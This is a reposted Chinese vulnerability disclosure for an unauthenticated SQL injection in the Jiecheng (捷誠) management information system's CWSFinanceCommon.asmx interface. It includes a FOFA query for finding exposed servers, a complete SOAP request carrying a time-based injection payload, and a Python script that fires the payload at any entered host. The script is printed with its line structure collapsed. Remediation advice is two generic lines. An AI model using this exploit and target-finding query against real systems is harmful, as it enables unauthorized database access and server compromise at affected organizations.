捷誠管理信息系統 SQL注入漏洞

聲明
本文僅用于技術交流，請勿用于非法用途
由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失，均由使用者本人負責，文章作者不為此承擔任何責任。

一、產品介紹

捷誠管理信息系統是一款功能全面，可以支持自營、聯營到外柜租賃的管理，其自身帶工作流管理工具，能夠幫助企業有效的開展內部審批工作。

二、漏洞描述

該系統CWSFinanceCommon.asmx接口存在SQL注入漏洞。未經身份認證的攻擊者可以通過該漏洞獲取數據庫敏感信息，深入利用可獲取服務器權限。

三、fofa語法

body="/Scripts/EnjoyMsg.js"

?四、漏洞復現

重放

poc

POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetOSpById xmlns="http://tempuri.org/"><sId>1';waitfor delay '0:0:5'--+</sId></GetOSpById></soap:Body>
</soap:Envelope>

?python檢測腳本

import timeimport requestsdef verify(ip):url = f'{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx'headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','Connection': 'close','Content-Length': '369','Accept': '*/*','Accept-Language': 'en','Content-Type': 'text/xml; charset=utf-8','Accept-Encoding': 'gzip',}payload = '''<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetOSpById xmlns="http://tempuri.org/"><sId>1';waitfor delay '0:0:5'--+</sId></GetOSpById></soap:Body></soap:Envelope>'''try:start_time = time.time()response = requests.post(url, headers=headers, data=payload,verify=False)end_time = time.time()res_time = end_time - start_time# 驗證成功輸出相關信息if response.status_code == 200 and res_time > 5 and res_time < 8:print(f"{ip}存在捷誠管理信息系統SQL注入漏洞！！！")except Exception as e:passif __name__ == '__main__':self = input('請輸入目標主機IP地址：')verify(self)

?使用方法

五、修復建議

盡快修復漏洞，更新系統

設置訪問控制策略

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/news/163618.shtml
繁體地址，請注明出處：http://hk.pswp.cn/news/163618.shtml
英文地址，請注明出處：http://en.pswp.cn/news/163618.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！